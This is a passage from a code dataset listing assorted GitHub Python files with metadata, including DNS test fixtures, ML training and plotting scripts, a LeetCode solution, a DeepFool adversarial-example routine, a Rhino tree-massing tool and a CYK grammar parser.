aaaa_record[\"id\"])\n self.history_client.wait_until_recordset_exists(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n # update the record sets\n a_record_update = copy.deepcopy(a_record)\n a_record_update[\"ttl\"] += 100\n a_record_update[\"records\"][0][\"address\"] = \"9.9.9.9\"\n a_change = self.history_client.update_recordset(a_record_update, status=202)\n\n aaaa_record_update = copy.deepcopy(aaaa_record)\n aaaa_record_update[\"ttl\"] += 100\n aaaa_record_update[\"records\"][0][\"address\"] = \"2003:db8:0:0:0:0:0:4\"\n aaaa_change = self.history_client.update_recordset(aaaa_record_update, status=202)\n\n cname_record_update = copy.deepcopy(cname_record)\n cname_record_update[\"ttl\"] += 100\n cname_record_update[\"records\"][0][\"cname\"] = \"changed-cname.\"\n cname_change = self.history_client.update_recordset(cname_record_update, status=202)\n\n self.history_client.wait_until_recordset_change_status(a_change, \"Complete\")\n self.history_client.wait_until_recordset_change_status(aaaa_change, \"Complete\")\n self.history_client.wait_until_recordset_change_status(cname_change, \"Complete\")\n\n # delete the recordsets\n self.history_client.delete_recordset(a_record[\"zoneId\"], a_record[\"id\"])\n self.history_client.delete_recordset(aaaa_record[\"zoneId\"], aaaa_record[\"id\"])\n self.history_client.delete_recordset(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n self.history_client.wait_until_recordset_deleted(a_record[\"zoneId\"], a_record[\"id\"])\n self.history_client.wait_until_recordset_deleted(aaaa_record[\"zoneId\"], aaaa_record[\"id\"])\n self.history_client.wait_until_recordset_deleted(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n def init_group_activity(self):\n client = self.ok_vinyldns_client\n\n group_name = f\"test-list-group-activity-max-item-success{self.partition_id}\"\n\n members = [{\"id\": \"ok\"}]\n new_group = {\n \"name\": group_name,\n \"email\": \"test@test.com\",\n \"members\": members,\n \"admins\": [{\"id\": \"ok\"}]\n }\n created_group = client.create_group(new_group, status=200)\n\n update_groups = []\n updated_groups = []\n # each update changes the member\n for runner in range(0, 10):\n members = [{\"id\": \"dummy{0:0>3}\".format(runner)}]\n update_groups.append({\n \"id\": created_group[\"id\"],\n \"name\": group_name,\n \"email\": \"test@test.com\",\n \"members\": members,\n \"admins\": [{\"id\": \"ok\"}]\n })\n updated_groups.append(client.update_group(update_groups[runner][\"id\"], update_groups[runner], status=200))\n\n self.group_activity_created = created_group\n self.group_activity_updated = updated_groups\n\n def tear_down(self):\n \"\"\"\n The ok_vinyldns_client is a zone admin on _all_ the zones.\n\n We shouldn't have to do any checks now, as zone admins have full rights to all zones, including\n deleting all records (even in the old shared model)\n \"\"\"\n try:\n self.list_zones.tear_down()\n self.list_records_context.tear_down()\n\n if self.list_batch_summaries_context:\n self.list_batch_summaries_context.tear_down(self)\n\n if self.list_groups_context:\n self.list_groups_context.tear_down()\n\n for client in self.clients:\n client.clear_zones()\n\n for client in self.clients:\n client.clear_groups()\n\n # Close all clients\n for client in self.clients:\n client.tear_down()\n\n except Exception:\n traceback.print_exc()\n raise\n\n @staticmethod\n def confirm_member_in_group(client, group):\n retries = 2\n success = group in client.list_all_my_groups(status=200)\n while retries >= 0 and not success:\n success = group in client.list_all_my_groups(status=200)\n time.sleep(.05)\n retries -= 1\n assert_that(success, is_(True))\n","repo_name":"vinyldns/vinyldns","sub_path":"modules/api/src/test/functional/tests/shared_zone_test_context.py","file_name":"shared_zone_test_context.py","file_ext":"py","file_size_in_byte":28814,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"6"} +{"seq_id":"11104655076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 30 17:09:26 2019\n\n@author: WJH\n\"\"\"\n#%%\nimport time\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import StratifiedKFold\n\ndef elapsed(sec):\n \"\"\"\n 时间计算\n \"\"\"\n if sec<60:\n return str(sec)+\"sec\"\n elif sec<(60*60):\n return str(np.round(sec/60.0,2)) + \"min\"\n\ndef train_pred(model, train_X, train_y, val_X, val_y, test_X,epochs=2):\n \"\"\"\n 模型训练\n \"\"\"\n print(\"training begin.......\")\n pred_val_y = np.zeros((val_y.shape[0],1))\n pred_test_y = np.zeros((test_X.shape[0],1))\n for e in range(epochs):\n start_time = time.time()\n model.fit(train_X,train_y,batch_size=512,epochs=1,validation_data=(val_X,val_y))\n temp_val_y = model.predict([val_X],batch_size=1024,verbose=1)\n pred_test_y += model.predict([test_X],batch_size=1024,verbose=1)/epochs\n \n best_thresh = 0.5\n best_score = 0.0\n for thresh in np.arange(0.1, 0.501, 0.01):\n thresh = np.round(thresh, 2)\n score = metrics.f1_score(val_y, (temp_val_y > thresh).astype(int))\n if score > best_score:\n best_thresh = thresh\n best_score = score\n\n print(\"Best Val F1 Score at {} is: {:.4f}\".format(best_thresh,best_score))\n print(f\"epoch finished: {elapsed(time.time()-start_time)}\")\n \n pred_val_y += temp_val_y/epochs\n \n return pred_val_y, pred_test_y\n\ndef train_corss_val(model,train_X,train_y,test_X,epochs=2):\n spliter = StratifiedKFold(n_splits=4, shuffle=False)\n train_predict = np.zeros(train_y.shape)\n test_predict = np.zeros(test_X.shape[0])\n \n stage3_time = time.time()\n for fold_id,(train_idx,val_idx) in enumerate(spliter.split(train_X,train_y)):\n print('FOLD:',fold_id)\n X_train = train_X[train_idx]\n y_train = train_y[train_idx]\n X_val = train_X[val_idx]\n y_val = train_y[val_idx]\n \n pred_val_y, pred_test_y = train_pred(model, X_train, y_train, X_val, y_val,test_X,epochs = 5)\n train_predict[val_idx] = pred_val_y.reshape(-1)\n test_predict += pred_test_y\n \n print(\"Cross Training model used time:\", elapsed(time.time()-stage3_time))\n return train_predict,test_predict\n","repo_name":"jianhongwu/Kaggle-Quora-Insincere-Questions-Classification","sub_path":"models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32469156868","text":"class Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n targets = collections.defaultdict(list)\n for a, b in sorted(tickets,reverse=True): targets[a].append(b)\n \n route = []\n \n def visit(airport):\n while targets[airport]: visit(targets[airport].pop())\n route.append(airport)\n \n visit(\"JFK\")\n \n return route[::-1]\n","repo_name":"MdAbedin/leetcode","sub_path":"0301 - 0400/0332 Reconstruct Itinerary.py","file_name":"0332 Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"26566250459","text":"import pandas as pd\nimport seaborn as sns\n\nsns.set_theme(style=\"whitegrid\")\n\n\ndef get_plot_from_accuracy(**kwargs) -> None:\n \"\"\"\n Accuracy plot by position.\n \"\"\"\n df_list = []\n for key, accuracy_dict in kwargs.items():\n df = pd.DataFrame.from_dict(accuracy_dict, orient='index', columns=['accuracy']).head(8)\n df['type'] = key\n df_list.append(df)\n g = sns.catplot(\n data=pd.concat(df_list).reset_index(), kind=\"bar\",\n x=\"index\", y=\"accuracy\", hue=\"type\",\n palette=\"bone\", height=6, legend_out=False\n )\n g.set(ylim=(0.4, 0.7))\n g.set_axis_labels(\"Sequence length\", \"accuracy@4\")\n g.savefig(\"accuracy_by_position.pdf\")\n\n\ndef get_plot_from_distribution_by_pos(df: pd.DataFrame):\n \"\"\"\n Plot distribution by position from dataframe.\n \"\"\"\n df_melt = pd.melt(df,\n value_vars=['train_set', 'submission'],\n var_name='dataset_type',\n value_name='sequence_length',\n ignore_index=False)\n\n sns.set_style('white')\n sns.set_context('paper', font_scale=2)\n sns.set_palette(['#000000', '#ABABAB'])\n sns.set_style('ticks', {'axes.edgecolor': '0',\n 'xtick.color': '0',\n 'ytick.color': '0'})\n\n g = sns.catplot(\n data=df_melt.reset_index(), kind=\"bar\",\n x=\"index\", y=\"sequence_length\", hue=\"dataset_type\",\n ci=\"sd\", height=6, legend_out=False,\n )\n g.set_axis_labels(\"Sequence length\", \"Proportion\")\n new_labels = ['Training set', 'Submission set']\n for t, l in zip(g._legend.texts, new_labels):\n t.set_text(l)\n\n g._legend.set_title('')\n g.savefig(\"sequence_length_distribution.pdf\")\n","repo_name":"mbaigorria/booking-challenge-2021-recsys","sub_path":"recsys/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"947823067","text":"import pandas as pd\n\ndef read_data(uc_name):\n \"\"\"\n This function reads the data given specific school name and returns it.\n \"\"\"\n csv_location = \"../data/csv/ucop\"\n file_name = 'ucop' + '_' + uc_name + '_' + '2018' + '_' + 'auto' + '.csv'\n relative_path = csv_location + '/' + file_name\n salary_data = pd.read_csv(relative_path, thousands=',')\n return salary_data\n \ndef calculate_netsalary(salary_data):\n \"\"\"\n This function takes salary data and formats its columns in order to create net salary column.\n : param salary_data: (pd.DataFrame), salary data \n : return: salary_data_formatted: (pd.DataFrame), salary data added net salary column \n \"\"\"\n \n del salary_data['GrossPay'];\n # Turning pay columns into numeric ones and create TotalPay column:\n salary_data[['RegularPay', 'OvertimePay', 'OtherPay']] = salary_data[['RegularPay', 'OvertimePay', 'OtherPay']].apply(pd.to_numeric) \n salary_data['TotalPay'] = salary_data['RegularPay'] + salary_data['OvertimePay'] + salary_data['OtherPay']\n return salary_data\n\ndef create_mean_salaries(uc_schools):\n \"\"\"\n This function takes a list of uc schools and it returns mean salary values.\n : param uc_schools: (list), uc schools\n : return: mean_salaries: (list), mean salary values for specified uc schools\n \"\"\"\n assert len(uc_schools) > 0\n \n mean_salaries = list()\n for school in uc_schools:\n salary_data = read_data(school)\n salary_data = calculate_netsalary(salary_data)\n salary_data_professors = salary_data[salary_data['Title'].str.contains(\"PROF\")]\n total_payment = salary_data_professors['TotalPay'];\n mean_salaries.append(int(total_payment.mean())/1000) \n return mean_salaries\n","repo_name":"guptarohit994/ECE143_group25_project","sub_path":"statistical_analysis/helper_salary.py","file_name":"helper_salary.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15610052684","text":"import tools.utils_mi as xmutils \r\n\r\ndef getRouterInfo(deviceId, cookie):\r\n apiUrl = xmutils.getApi(xmutils.getUserRegion()) + \"/appgateway/third/miwifi/app/r/api/xqsystem/init_info\"\r\n \r\n data = {\r\n \"data\": r'{\"method\":\"POST\",\"params\":{\"deviceId\":\"' + deviceId + '\"}}'\r\n }\r\n\r\n return xmutils.sendPostRequest(apiUrl, data, cookie)","repo_name":"azwhikaru/miio-python","sub_path":"module/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31538726334","text":"def revword(new):\r\n new = new.lower().strip()[::-1]\r\n return(new)\r\n\r\ndef countword():\r\n fh = open(\"text.txt\" , \"r\")\r\n Counter = 1\r\n for line in fh:\r\n new_word = ''\r\n lineWords = line.split(\" \")\r\n if len(lineWords) == 1:\r\n W1 = lineWords[0].lower().strip()\r\n print(W1 ,end ='')\r\n else:\r\n for j in lineWords:\r\n Word = revword(j)\r\n new_word += (Word + ' ')\r\n if Word == W1:\r\n Counter += 1\r\n print(new_word)\r\n print(Counter)\r\ncountword()\r\n\r\n","repo_name":"LidorDahari/Advanced-data-mining-and-analysis-course","sub_path":"assignment 1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2248540171","text":"def vraag_leeftijd_gebruiker(vraag: str) -> int:\n while True:\n leeftijd_string = input(vraag)\n if not leeftijd_string.isnumeric():\n print(\"voer een getal in\")\n elif int(leeftijd_string) > 130:\n print(\"Zo oud is nog niemand geworden!\")\n elif int(leeftijd_string) < 0:\n print(\"U moet nog geboren worden\")\n else:\n leeftijd = int(leeftijd_string)\n break\n return leeftijd\ndef is_achttien(age : int) -> bool:\n voldoet = False\n if age >= 18:\n voldoet = True\n return voldoet\n \n\nnaam = input(\"Hoe heet je?\")\nleeftijd = vraag_leeftijd_gebruiker(\"Hoe oud ben je?\")\njaren = is_achttien()\nif voldoet == True:\n print\nprint(f\"hoi {naam}, je bent {leeftijd} oud en {jaren}\")","repo_name":"MaxQutimu/leren-programmeren","sub_path":"Leren Programmeren/M-05-Meer-Functions/voorbeeld.py","file_name":"voorbeeld.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18542279050","text":"import torch\nfrom torch import nn\n\n\ndef deepfool(\n model_fn,\n x,\n y,\n device,\n steps=50,\n overshoot=0.02,\n return_target_y=False\n):\n x = x.clone().detach().to(device)\n y = y.clone().detach().to(device)\n\n batch_size = len(x)\n correct = torch.tensor([True] * batch_size)\n target_y = y.clone().detach().to(device)\n curr_steps = 0\n\n adv_x = []\n for idx in range(batch_size):\n x_temp = x[idx:idx + 1].clone().detach()\n adv_x.append(x_temp)\n\n while (True in correct) and (curr_steps < steps):\n for idx in range(batch_size):\n if not correct[idx]: continue\n early_stop, pre, adv_x_temp = forward_indiv(model_fn, adv_x[idx], y[idx], overshoot)\n adv_x[idx] = adv_x_temp\n target_y[idx] = pre\n if early_stop:\n correct[idx] = False\n curr_steps += 1\n\n adv_x = torch.cat(adv_x).detach()\n\n if return_target_y:\n return adv_x, target_y\n return adv_x\n\n\ndef forward_indiv(model, x, label, overshoot):\n x.requires_grad = True\n fs = get_logits(model, x)[0]\n _, pre = torch.max(fs, dim=0)\n if pre != label:\n return (True, pre, x)\n\n ws = construct_jacobian(fs, x)\n x = x.detach()\n\n f_0 = fs[label]\n w_0 = ws[label]\n\n wrong_classes = [i for i in range(len(fs)) if i != label]\n f_k = fs[wrong_classes]\n w_k = ws[wrong_classes]\n\n f_prime = f_k - f_0\n w_prime = w_k - w_0\n value = torch.abs(f_prime) \\\n / torch.norm(nn.Flatten()(w_prime), p=2, dim=1)\n _, hat_L = torch.min(value, 0)\n\n delta = (torch.abs(f_prime[hat_L])*w_prime[hat_L]\n / (torch.norm(w_prime[hat_L], p=2)**2))\n\n target_label = hat_L if hat_L < label else hat_L+1\n\n adv_x = x + (1+ overshoot)*delta\n adv_x = torch.clamp(adv_x, min=0, max=1).detach()\n return (False, target_label, adv_x)\n\ndef get_logits(model, inputs, labels=None, *args, **kwargs):\n logits = model(inputs)\n return logits\n\n\ndef construct_jacobian(y, x):\n x_grads = []\n for idx, y_element in enumerate(y):\n if x.grad is not None:\n x.grad.zero_()\n y_element.backward(retain_graph=(False or idx+1 < len(y)))\n x_grads.append(x.grad.clone().detach())\n return torch.stack(x_grads).reshape(*y.shape, *x.shape)","repo_name":"wxwmd/time-series-dl-attack","sub_path":"attacks/adversarial/cleverhans/whitebox/deepfool.py","file_name":"deepfool.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72986217467","text":"import rhinoscriptsyntax as rs\nimport math\nimport random\n\n'''\n\nCopyright <2022> \n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\nWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'''\n\n# Calculate Soil requirements\n\n\ndef TreeMassing():\n try:\n\n litre = rs.GetReal(\"Enter the root ball litres, max 2000 Litres\", 400)\n soilDepth = rs.GetReal('Enter the soil depth available in m', 0.8)\n matureHeight = rs.GetReal('Enter the mature tree height in m', 5)\n dbh = rs.GetReal(\n 'Enter the DBH at maturity in m, if unknown hit Enter', 0)\n userPt = rs.GetPoint('Pick a point to place rootball')\n\n rs.EnableRedraw(False)\n\n # Dictionery for litre size to pot Rootball Diameter [0] / Rootball Height [1] / Calliper [2] / Height [3] / Spread [4]\n # Figures obtained from https://winterhill.com.au/tree-sizes/\n PotDict = {\n 25: [0.300, 0.250, 0.020, 1.000, 0.500],\n 45: [0.420, 0.350, 0.025, 2.000, 1.000],\n 75: [0.465, 0.500, 0.035, 2.500, 2.000],\n 100: [0.520, 0.560, 0.050, 3.500, 2.000],\n 200: [0.700, 0.625, 0.070, 4.500, 3.000],\n 400: [0.980, 0.715, 0.090, 6.000, 4.000],\n 600: [1.200, 0.600, 0.100, 6.000, 5.000],\n 800: [1.300, 0.600, 0.120, 7.000, 5.000],\n 1000: [1.500, 0.600, 0.150, 8.000, 5.000],\n 2000: [2.000, 0.800, 0.200, 9.000, 5.000],\n }\n\n def closest(lst, K):\n\n return lst[min(range(len(lst)), key=lambda i: abs(lst[i]-K))]\n\n def scale():\n system = rs.UnitSystem()\n if system == 2 or system == 3 or system == 4:\n scaleFactorDict = {2: 1000, 3: 100, 4: 1}\n scaleFactor = scaleFactorDict[system]\n return scaleFactor\n\n if system != 2 or system != 3 or system != 4:\n return None\n\n s = scale()\n\n if s == None:\n rs.MessageBox(\n \"This tool is can only be used in mm, cm or m model units\")\n return None\n\n # Calc for standard soil requirements as per Australian Standards\n\n if dbh == 0:\n dbh = ((matureHeight / 100) * 4) * 1000 # Gives a DBH in mm\n # Gives a required soil volume in M3\n reqSoil = (matureHeight * dbh) / 100\n reqSoilRadius = math.sqrt(reqSoil / ((math.pi)*soilDepth))\n\n # Add soil puck to doc\n reqSoilRadiusCyl = rs.AddCylinder(\n userPt, (soilDepth*s), (reqSoilRadius*s), cap=True)\n rs.ObjectColor(reqSoilRadiusCyl, (150, 75, 0))\n\n # Calc for size of rootball as per standard pot sizes\n litreMatch = closest(list(PotDict.keys()), litre)\n dia = (PotDict[litreMatch])[0]\n height = (PotDict[litreMatch])[1]\n\n # Add Rootball to doc\n rootballCyl = rs.AddCylinder(userPt, (height*s), ((dia/2)*s))\n rs.ObjectColor(rootballCyl, (0, 128, 0))\n vec = (0, 0, ((soilDepth*s) - (height*s)))\n rs.MoveObject(rootballCyl, vec)\n\n # Add Tree model based on Dict\n calliper = (PotDict[litreMatch])[2]\n treeHeight = (PotDict[litreMatch])[3]\n spread = (PotDict[litreMatch])[4]\n vec02 = (0, 0, (((soilDepth*s) - (height*s))) + (height*s))\n\n treeTrunk = rs.AddCylinder(userPt, (treeHeight*s), (calliper*s))\n rs.ObjectColor(treeTrunk, (101, 67, 33))\n rs.MoveObject(treeTrunk, vec02)\n canopy = rs.AddSphere(userPt, ((spread/2)*s))\n rs.ObjectColor(canopy, (33, 101, 67))\n vec03 = (0, 0, (((soilDepth*s) - (height*s))) +\n (height*s) + (treeHeight*s) - ((spread/2)*s))\n rs.MoveObject(canopy, vec03)\n\n # Various Text Annotation\n txt1 = rs.AddText('Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s), userPt,\n height=(.1*s), font=\"Arial\", font_style=0, justification=2)\n\n txt2 = rs.AddText('Soil Volume Requirement = ' + str(reqSoil) + ' m3', (userPt.X, (userPt.Y - (.2*s)), userPt.Z),\n height=(.1*s), font=\"Arial\", font_style=0, justification=2)\n\n block = rs.AddBlock((reqSoilRadiusCyl, rootballCyl, treeTrunk, canopy, txt1, txt2), userPt,\n (\"Rootball and Soil \" + (str(random.random()))), delete_input=True)\n rs.BlockDescription(block, 'Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s)\n + ', Soil Volume Requirement = ' + str(reqSoil) + ' m3')\n\n guid = rs.InsertBlock(block, userPt)\n rs.ObjectName(guid, 'Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s)\n + ', Soil Volume Requirement = ' + str(reqSoil) + ' m3')\n\n rs.EnableRedraw(True)\n\n except:\n print(\"Failed to execute\")\n rs.EnableRedraw(True)\n return\n\n\nif __name__ == \"__main__\":\n TreeMassing()\n","repo_name":"TSRChapman/LandArchTools-for-Rhino","sub_path":"TreeMassing.py","file_name":"TreeMassing.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"22872315259","text":"#https://leetcode.com/problems/search-a-2d-matrix-ii/description/\n#time O(m+n), space O(1)\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m = len(matrix)\n n = len(matrix[0])\n row = 0\n col = n-1\n while row=0:\n if matrix[row][col]==target:\n return True\n elif matrix[row][col]=3.6.8\",\n include_package_data=True,\n has_ext_modules=lambda: True,\n package_dir={\"\": \"SRA-Importer\"},\n classifiers=[\n 'Programming Language :: Python',\n 'License :: OSI Approved :: MIT License'\n ],\n easy_install=\"ok_zip\"\n )\n","repo_name":"AmitKabya/SRA-Importer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2486968107","text":"import numpy as np\n\n\nclass CYK:\n def __init__(self,\n recognizer: callable,\n terminal: list[str],\n nonterminal: list[str],\n image_symbol: str,\n horizontal_rules: list[tuple[str, str, str]],\n vertical_rules: list[tuple[str, str, str]],\n replace_rules: list[tuple[str, str]]) -> None:\n self.recognizer = recognizer\n self.terminal = terminal\n self.nonterminal = nonterminal\n self.image_symbol = image_symbol\n self._f: list[tuple[int, int, str]] = []\n self.horizontal_rules: list[tuple[str, str, str]] = horizontal_rules\n self.vertical_rules: list[tuple[str, str, str]] = vertical_rules\n self.replace_rules: list[tuple[str, str]] = replace_rules\n\n def __call__(self,\n image: np.ndarray,\n w_step: int = 1,\n h_step: int = 1,\n min_h: int = 1,\n min_w: int = 1,\n window_size_h_step: int = 1,\n window_size_w_step: int = 1) -> bool:\n self._f = self.init_f(image, w_step, h_step, min_h, min_w, window_size_h_step, window_size_w_step)\n\n indexes = np.arange(np.product(image.shape)).reshape(image.shape)\n for h in range(min_h, image.shape[0]+1, window_size_h_step):\n for w in range(min_w, image.shape[1]+1, window_size_w_step):\n sl_windows = self.sliding_window(indexes, w, h, w_step, h_step)\n sl_windows = sl_windows.reshape((sl_windows.shape[0] * sl_windows.shape[1],\n sl_windows.shape[2], sl_windows.shape[3]))\n for label in self.nonterminal:\n for window in sl_windows:\n if self.H(window, label, min_w, window_size_w_step):\n self._f.append((window[0, 0], window[-1, -1], label))\n elif self.V(window, label, min_h, window_size_h_step):\n self._f.append((window[0, 0], window[-1, -1], label))\n elif self.R(window, label):\n self._f.append((window[0, 0], window[-1, -1], label))\n\n return (0, image.shape[0] * image.shape[1] - 1, self.image_symbol) in self._f\n\n @staticmethod\n def sliding_window(array: np.ndarray,\n width: int,\n height: int,\n w_step: int = 1,\n h_step: int = 1) -> np.ndarray:\n shape = ((array.shape[0] - height) // h_step + 1,) + ((array.shape[1] - width) // w_step + 1,) + (height, width)\n strides = array.strides[:-2] + (array.strides[-2] * h_step,) + (array.strides[-1] * w_step,) + array.strides[-2:]\n return np.lib.stride_tricks.as_strided(array, shape=shape, strides=strides)\n\n def init_f(self,\n image: np.ndarray,\n w_step: int = 1,\n h_step: int = 1,\n min_h: int = 1,\n min_w: int = 1,\n window_size_h_step: int = 1,\n window_size_w_step: int = 1) -> list[tuple[int, int, str]]:\n f: list[tuple[int, int, str]] = []\n\n flatten_image = image.flatten()\n indexes = np.arange(np.product(image.shape)).reshape(image.shape)\n\n for h in range(min_h, image.shape[0]+1, window_size_h_step):\n for w in range(min_w, image.shape[1]+1, window_size_w_step):\n sl_windows = self.sliding_window(indexes, w, h, w_step, h_step)\n sl_windows = sl_windows.reshape((sl_windows.shape[0] * sl_windows.shape[1],\n sl_windows.shape[2], sl_windows.shape[3]))\n for label in self.terminal:\n for window in sl_windows:\n if self.recognizer(flatten_image[window.flatten()].reshape(window.shape), label):\n f.append((window[0, 0], window[-1, -1], label))\n\n return f\n\n def H(self, idx_img: np.ndarray, label: str, min_w: int = 1, w_step: int = 1) -> bool:\n for w in range(min_w, idx_img.shape[1], w_step):\n left_part = idx_img[:, :w]\n right_part = idx_img[:, w:]\n for nl in self.nonterminal + self.terminal:\n for nr in self.nonterminal + self.terminal:\n if (left_part[0, 0], left_part[-1, -1], nl) in self._f \\\n and ((label, nl, nr) in self.horizontal_rules) \\\n and (right_part[0, 0], right_part[-1, -1], nr) in self._f:\n return True\n\n return False\n\n def V(self, idx_img: np.ndarray, label: str, min_h: int = 1, h_step: int = 1) -> bool:\n for h in range(min_h, idx_img.shape[0], h_step):\n upper_part = idx_img[:h, :]\n down_part = idx_img[h:, :]\n for nu in self.nonterminal + self.terminal:\n for nd in self.nonterminal + self.terminal:\n if (upper_part[0, 0], upper_part[-1, -1], nu) in self._f \\\n and ((label, nu, nd) in self.vertical_rules) \\\n and (down_part[0, 0], down_part[-1, -1], nd) in self._f:\n return True\n\n return False\n\n def R(self, idx_img: np.ndarray, label: str) -> bool:\n for t in self.terminal + self.nonterminal:\n if (idx_img[0, 0], idx_img[-1, -1], t) in self._f and ((label, t) in self.replace_rules):\n return True\n\n return False\n\n def __parse_rules(self, rules: str) -> None:\n raise NotImplementedError\n\n def create_gh(self, left_symbol: str, right_s1: str, right_s2: str) -> None:\n self.horizontal_rules.append((left_symbol, right_s1, right_s2))\n\n def create_gv(self, left_symbol: str, right_s1: str, right_s2: str) -> None:\n self.vertical_rules.append((left_symbol, right_s1, right_s2))\n\n def create_g(self, s1: str, s2: str) -> None:\n self.replace_rules.append((s1, s2))\n","repo_name":"Pavlo3P/Object-Recognition","sub_path":"algorithms/cyk/cyk.py","file_name":"cyk.py","file_ext":"py","file_size_in_byte":6084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5672662393","text":"from wordlist import *\nimport numpy as np\nimport os\nimport sys\nsys.path.append(\"../lm-watermarking/\")\nfrom six.moves import cPickle as pkl\nfrom matplotlib import pyplot as plt\nfrom utils import parse_args\nimport matplotlib\nfrom matplotlib.colors import LogNorm\nimport seaborn as sns\nsns.set_theme()\n\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\nSMALL_SIZE = 15\nMEDIUM_SIZE = 20\nBIGGER_SIZE = 20\n\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=12) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\nargs = parse_args()\nM = np.load(os.path.join(args.DUMP, \"matrix.npy\"))\n\nW = \"the\"\ni1 = word_to_index[W]\nx = np.stack([index_to_word[i] for i in range(181)])\ny = M[i1]/M[i1].sum()\norder = np.argsort(y)[-50:][::-1]\nx = x[order]\ny = y[order]\n\n# plt.figure(figsize=(12,3), dpi=500)\n# plt.plot(x, y, '-+', markersize=4)\n# plt.xlabel(\"Top 50 words\")\n# plt.ylabel(\"Green list\\nscore\")\n# # plt.title(\"Suffix score for the word '{}'\".format(W))\n# plt.xticks(rotation=90)\n# # plt.yticks(np.round(100*np.linspace(0, y.max(), 5))/100)\n# plt.semilogy()\n# plt.tight_layout()\n# plt.savefig(\"images/{}.png\".format(W))\n\nplt.figure(figsize=(7,6), dpi=500)\nticks = [index_to_word[i] for i in range(20)]\nM = M[:20, :20]\nM1 = np.stack([M[i]/M[i].sum() for i in range(len(M))])\nax = sns.heatmap(M1, linewidth=0.05, xticklabels=ticks, yticklabels=ticks, norm=LogNorm())\nplt.tight_layout()\nplt.savefig(\"images/heat.png\")","repo_name":"vinusankars/Reliability-of-AI-text-detectors","sub_path":"pair-distribution/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"} +{"seq_id":"23915362761","text":"import pandas as pd #数据分析,结构化表格及其操作\r\nimport numpy as np #数值计算,科学计算\r\nimport matplotlib.pyplot as plt #作图工具\r\nfrom pathlib import Path #将csv文件整合成py可以识别的类型\r\nfrom IPython.display import display\r\nimport toad\r\n\r\npd.set_option('display.max_rows', 500)\r\npd.set_option('display.max_columns', 500)\r\npd.set_option('display.width', 1000)\r\n\r\ndef load_date(path): #读取文档,载入数据\r\n application = pd.read_csv(Path(path, 'home-credit-default-risk/application_train.csv'))\r\n bureau = pd.read_csv(Path(path, 'home-credit-default-risk/bureau.csv'))\r\n bureau_balance = pd.read_csv(Path(path, 'home-credit-default-risk/bureau_balance.csv'))\r\n credit_card_balance = pd.read_csv(Path(path, 'home-credit-default-risk/credit_card_balance.csv'))\r\n installments_payments = pd.read_csv(Path(path, 'home-credit-default-risk/installments_payments.csv'))\r\n POS_CASH_balance = pd.read_csv(Path(path, 'home-credit-default-risk/POS_CASH_balance.csv'))\r\n previous_application = pd.read_csv(Path(path, 'home-credit-default-risk/previous_application.csv'))\r\n return application,bureau,bureau_balance,credit_card_balance,installments_payments,POS_CASH_balance,previous_application\r\n\r\ndate_path = 